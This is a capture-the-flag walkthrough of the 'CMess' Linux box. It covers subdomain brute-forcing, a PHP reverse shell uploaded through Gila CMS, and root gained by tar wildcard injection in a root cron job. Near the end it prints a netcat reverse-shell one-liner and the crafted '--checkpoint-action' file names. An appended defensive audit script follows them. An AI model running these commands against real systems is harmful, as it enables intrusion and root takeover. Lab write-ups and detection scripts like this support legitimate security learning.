V3NU5💀AL13N:~#


CMess

OS = LINUX

DIFFICULTY = MEDIUM

nmap scan

The scan shows two open ports.

Let's start our enumeration with port 80.

Going over to the web page shows that it is running Gila CMS.

So, let's add the domain "cmess.thm" to our /etc/hosts file.

Brute-forcing subdomains with ffuf then shows that there is a subdomain "dev.cmess.thm".

Add the subdomain to the /etc/hosts file too.

Going over to the dev subdomain in the browser, we find some credentials on the page.

So, let's try these credentials on the admin login page.

It works, and we can see the Gila CMS version.

Moving on to the Content page on the dashboard, we can use the file manager to upload a reverse shell script.

We're able to upload a PHP reverse shell.

Set your ncat listener, then visit the assets directory to load the uploaded shell.

This spawns a shell on the target system.

We have our reverse shell, so let's stabilize it. Our privileges are limited, so let's try escalating them.

Privilege escalation

We upload linpeas to the box.

It finds a password backup file in the /opt directory, which contains the password for the user "andre".

SSHing into the server with that username and password, we're able to read the user flag.

Okay, so from this we know that there's a backup service running on the server. We can also see this in the linpeas report, and we found the backed-up file in the /tmp folder earlier when we were looking for user priv-esc. We can in fact see the exact command that is run when the backup happens:

*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

There's a way to exploit tar if it uses wildcards; there is more info on it in this article: link.

The name of the attack is wildcard injection, and it's a way to make tar run an executable for us. Since the backup service is running as root, if we make this executable a reverse shell, then we've got ourselves a root shell. Set your netcat listener, then:

1. echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.3.145 1337 >/tmp/f" > shell.sh

2. echo ""> "--checkpoint-action=exec=sh shell.sh"

3. echo ""> --checkpoint=1

And we are root lol ;)
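To close from the defender's side, here is an added POSIX shell audit (my code, not part of the original writeup): it flags a crontab line that hands tar an unquoted shell glob, lists files in a backup directory whose names look like options, and carries a hardened form of the cron entry. The crontab line and paths come from the writeup; the function names, the hardened line and the sample directory are my own.

```shell
#!/bin/sh
# Added defender-side example; not part of the original writeup. Audits the
# cron backup pattern abused above: "cd DIR && tar ... *" lets any file in DIR
# whose name starts with "-" be parsed by tar as an option.

# The vulnerable entry quoted in the writeup, and a hardened form (assumption:
# archiving "." via -C gives tar no member names that could look like options).
VULN_BACKUP_LINE='*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *'
SAFE_BACKUP_LINE='*/2 * * * * root tar -zcf /tmp/andre_backup.tar.gz -C /home/andre/backup .'

# Exit status 0 when a crontab line invokes tar with a bare "*" argument.
tar_glob_risky() {
    printf '%s\n' "$1" | grep -Eq '(^|[[:space:]/])tar[[:space:]].*[[:space:]]\*([[:space:]]|$)'
}

# Prints entries of a directory whose names begin with "-": the names a
# glob-fed tar would treat as options (e.g. "--checkpoint=1").
option_like_names() {
    for entry in "$1"/*; do
        [ -e "$entry" ] || continue          # unmatched glob stays literal; skip it
        name=${entry##*/}
        case $name in
            -*) printf '%s\n' "$name" ;;
        esac
    done
}

# Scans a crontab file, reports risky lines on stderr, prints their count.
count_risky_cron_entries() {
    n=0
    while IFS= read -r line; do
        case $line in ''|\#*) continue ;; esac   # skip blanks and comments
        if tar_glob_risky "$line"; then
            n=$((n + 1))
            printf 'risky: %s\n' "$line" >&2
        fi
    done < "$1"
    echo "$n"
}

# Demo on constructed input: a temp dir holding one option-like file name.
demo_dir=$(mktemp -d)
touch "$demo_dir/notes.txt" "$demo_dir/--checkpoint=1"
tar_glob_risky "$VULN_BACKUP_LINE" && echo "vulnerable: $VULN_BACKUP_LINE"
tar_glob_risky "$SAFE_BACKUP_LINE" || echo "ok:         $SAFE_BACKUP_LINE"
echo "option-like names in $demo_dir:"; option_like_names "$demo_dir"
rm -rf "$demo_dir"
```

On a real host, point count_risky_cron_entries at /etc/crontab and the files under /etc/cron.d, and option_like_names at each directory those jobs archive.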


Thanks, hope you had fun!

For any enquiries, shoot me a DM on Twitter: link